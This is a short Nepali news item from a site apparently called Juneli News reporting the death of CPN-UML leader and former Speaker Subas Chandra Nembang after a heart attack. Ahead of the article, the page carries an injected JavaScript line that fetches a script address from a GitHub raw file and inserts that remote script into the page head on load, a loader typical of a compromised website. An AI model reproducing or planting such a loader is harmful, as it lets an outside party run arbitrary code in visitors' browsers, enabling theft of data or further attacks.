;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाडौं ।
हृदयघातका कारण नेकपा एमाले नेता, पूर्व सभामुख , एमाले पार्टीका उपाध्यक्ष सुवासचन्द्र नेम्वाङको निधन भएको छ । गए राति १ बजे हिर्दयघात भए पछि महाराजगन्ज शिक्षण अस्पताल लगिएको थियो। डाक्टरले उनलाई मृत घोषणा गरेका हुन्।
केहीबेरमा मन्त्रिपरिषद् बैठक बसेर नेम्वाङलाई राष्ट्रिय सम्मान दिने निर्णय गर्ने तयारी भएको छ।
फेसबुक प्रतिक्रियाहरु